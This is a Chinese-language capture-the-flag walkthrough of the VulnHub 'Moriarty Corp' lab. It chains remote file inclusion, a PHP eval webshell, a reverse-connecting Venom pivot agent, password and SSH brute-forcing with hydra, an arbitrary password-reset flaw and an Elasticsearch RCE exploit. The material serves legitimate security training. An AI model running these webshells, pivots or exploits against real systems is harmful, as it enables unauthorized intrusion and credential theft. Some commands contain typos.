介绍
-
Vulnhub地址:BoredHacker博客: Moriarty Corp ~ VulnHub
-
发布日期: 29 Mar 2020
-
难度:中等
-
描述:
你好代理。
你来这里执行一项特殊任务。
一项任务是摧毁最大的武器供应商之一,即莫里亚蒂公司。
在网络应用程序中输入标志{开始}以开始使用!
笔记:
- Web 面板位于端口 8000 上(不在范围内。不要攻击)
- 标志以 #_flag.txt 格式存储。标志以标志{}格式输入。它们通常存储在 / 目录中,但可以位于不同的位置。
- 若要暂时停止播放,请暂停 VM。不要关闭它。
- 添加标志时,Web 应用会在后台启动 docker 容器。关闭并重新启动会搞砸它。
-
靶场环境:
机器 | ip |
---|---|
kali | 10.4.7.135 |
靶机 | 10.4.7.141:8000 |
信息收集
主机发现
arp-scan -l
端口扫描
namp -sV -O 10.4.7.141
网站探测
根据 Vulnhub 描述访问8000端口。
输入 flag{start}
开始。
根据提示,继续访问80端口。
在网站的连接中发现文件包含漏洞。
文件包含漏洞,通常分为本地文件包含和远程文件包含。本地文件包含,通常需要能够写入 webshell 的文件进行包含,进而获取 shell 权限。远程文件包含,可对远程写入 webshell 的文件进行包含,获取 shell 权限。
Web渗透
文件包含
在 kali 开启 Web 服务,靶机访问 php.php 文件进行包含,验证远程文件漏洞存在。
echo "<?php phpinfo(); ?>" > php.php
python3 -m http.server 80
上传一句话木马。
<?php eval($_POST['ant']; ?>
使用中国蚁剑连接。
在 /
目录下找到第一个 flag。
flag{the_game_is_on}
回到8000端口提交 flag,提示给了内网网段172.17.0.3-254
。
内网渗透
添加代理
后续的主机都在内网中,使用 Venom
工具添加搭理。
kali 执行工具。
./admin_linux_x86 -lport 7777
使用蚁剑上传文件到靶机。
权限不够,进行赋权,执行文件。
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 10.4.7.135 -rport 7777
kali 获得回显,执行命令。
goto 1
socks 9999
内网扫描
根据提示得知内网开启了80端口,直接扫描,发现172.17.0.4
开启了80端口。
proxychains nmap -Pn -sT 172.17.0.0/24 -p 80
访问页面,发现一个文件上传页面,需要输入上传密码。
密码爆破
用 burpsuite 抓取上传数据包进行密码爆破。
在 burpsuite 内还需要设置 socks 代理,不然无法上传内网服务器。
密码爆破,使用top1000
字典,此处为节省时间直接使用明文。
添加文件并输入密码,上传 shell 文件成功后点击执行。
使用蚁剑连接,需要配置蚁剑的代理。
添加连接。
# URL地址
http://172.17.0.4/photo/23/shell.php
在/
目录下找到第二个flag。
flag{picture_is_worth_1000_words}
提交 flag。
SSH爆破
提交 flag 后给出新的提示,内网中有一台开启 ssh 服务的主机,并提供了用户名和密码。
扫描内网中开启了22端口的主机,发现172.17.0.5
开启了22端口。
proxychains nmap 172.17.0.3-10 -sT -Pn -T4 -p22
将密码转换为明文,分别保存在两个 txt 文件中。
Usernames:
root
toor
admin
mcorp
moriarty
Password hashes (crack before brute forcing):
63a9f0ea7bb98050796b649e85481845:root
7b24afc8bc80e548d66c4e7ff72171c5:toor
5f4dcc3b5aa765d61d8327deb882cf99:password
21232f297a57a5a743894a0e4a801fc3:admin
084e0343a0486ff05530df6c705c8bb4:guest
697c6cc76fdbde5baccb7b3400391e30:MORIARTY
8839cfc8a0f24eb155ae3f7f205f5cbc:MCORP
35ac704fe1cc7807c914af478f20fd35:mcorp
b27a803ed346fbbf6d2e2eb88df1c51b:weapons
08552d48aa6d6d9c05dd67f1b4ba8747:moriarty
使用 hydra 进行密码爆破。
proxychains hydra -L user.txt -P password.txt ssh://172.17.0.5
ssh连接。
proxychains ssh root@172.17.0.5
找到第三个 flag,提交后给出新提示。
flag{what_weapons}
任意密码修改
根据提示扫描443,8000,8080,8888端口。
proxychains nmap 172.17.0.3-30 -sT -Pn -T4 -p443,8000,8080,8888
发现172.170.7:8000
开启了端口。
根据得到的账号和密码登录后台。
buyer13:arms13
查看网站具有两个功能,可以查看 chats 聊天记录,可以更改用户名密码。
查看记录后发现管理员账号名字为 admin
。
到修改登录用户密码界面,尝试抓包,发现任意用户修改密码漏洞。
成功修改admin
密码并登录。
获得第四个 flag。
flag{on_the_move}
远程执行代码
提交 flag 后给出新提示,文中提到一个 web 应用 Elasticsearch
是9200。
百度后发现该服务使用9200
端口。
扫描端口,发现172.17.0.8:9200
开启了端口。
proxychains nmap 172.17.0.3-30 -sT -Pn -T4 -p9200
访问页面,发现服务的版本 lucene_version "4.10.2"
。
使用 searchsploit
功能进行漏洞搜索。
searchsploit Elasticsearch
下载第一个远程执行代码漏洞。
earchsploit -m linux/remote/36337.py
运行命令,获得权限。
proxychains python2 36337.py 172.17.0.7
总结
本次包含:
-
文件包含
-
一句话木马
-
蚁剑连接
-
添加代理
-
内网扫描
-
密码爆破
-
ssh爆破
-
任意密码修改
-
远程代码执行
参考文章
靶场攻略 | Moriarty Corp渗透测试的博客-CSDN博客
【精选】vlunhub- BoredHackerBlog Moriarty Corp_GALi_233的博客-CSDN博客
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_vlunhub网站-CSDN博客
【精选】中国蚁剑(antSword)下载、安装、使用教程_攀爬的小白的博客-CSDN博客
php中eval()函数的使用_eval() php-CSDN博客